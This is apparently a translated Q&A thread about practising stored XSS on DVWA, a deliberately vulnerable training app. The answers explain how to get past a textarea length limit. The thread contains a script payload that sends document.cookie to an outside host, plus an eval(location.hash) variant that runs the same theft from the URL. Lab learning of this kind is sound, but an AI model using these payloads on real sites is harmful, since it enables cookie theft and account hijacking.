我正在学习使用这个名为该死的易受攻击的网页应用的网络应用程序进行xss利用http://www.dvwa.co.uk/ 故意包含网络漏洞。
我正在尝试将javascript添加到这样的消息框中,请参阅图像
http://postimg.org/image/w6yeoj331/
它只接受一定数量的单词,然后不允许更多,这不允许我继续xss攻击。 我想在消息框中输入:
<script>new Image().src="http://192.168.1.14/cookie.php?"+document.cookie;</script>
这是处理消息和名称文本区域的php脚本
<?php
if(isset($_POST['btnSign']))
{
$message = trim($_POST['mtxMessage']);
$name = trim($_POST['txtName']);
// Sanitize message input
$message = stripslashes($message);
$message = mysql_real_escape_string($message);
// Sanitize name input
$name = mysql_real_escape_string($name);
$query = "INSERT INTO guestbook (comment,name) VALUES ('$message','$name');";
$result = mysql_query($query) or die('<pre>' . mysql_error() . '</pre>' );
}
?>
答案 0 :(得分:1)
页面上可能有一些JavaScript限制了您可以在textarea中输入的文本数量 - 尝试禁用JavaScript。
您还可以尝试Firebug,这样您就可以修改页面中的HTML内容或JavaScript,以消除长度限制。
或者,您可以使用拦截代理(例如ZAP或Burp Suite)拦截您的POST请求,然后在代理中修改请求。
另一个攻击媒介可能是在textarea中使用<script>eval(location.hash.substring(1))</script>
,然后通过在哈希值前加#
来在URL中添加代码。
(例如www.example.com/page.php#new Image().src="http://192.168.1.14/cookie.php?"+document.cookie;
)
此攻击会使页面容易通过使用存储的XSS漏洞反映XSS。
答案 1 :(得分:0)
这个解决方案对我来说非常适合
转到 - &gt; C:\ XAMPP \ htdocs中\ DVWA-1.0.8 \漏洞\ xss_s 使用notepad ++
进入index.php文件ctrl + f并搜索textarea,然后查看maxlentgh的那一行 将它从(示例 - &gt; maxlength = \“50)更改为您想要的任何内容
祝你好运!答案 2 :(得分:0)
1)右键单击消息框并检查元素 2)将最大字符长度更改为999 3)按F12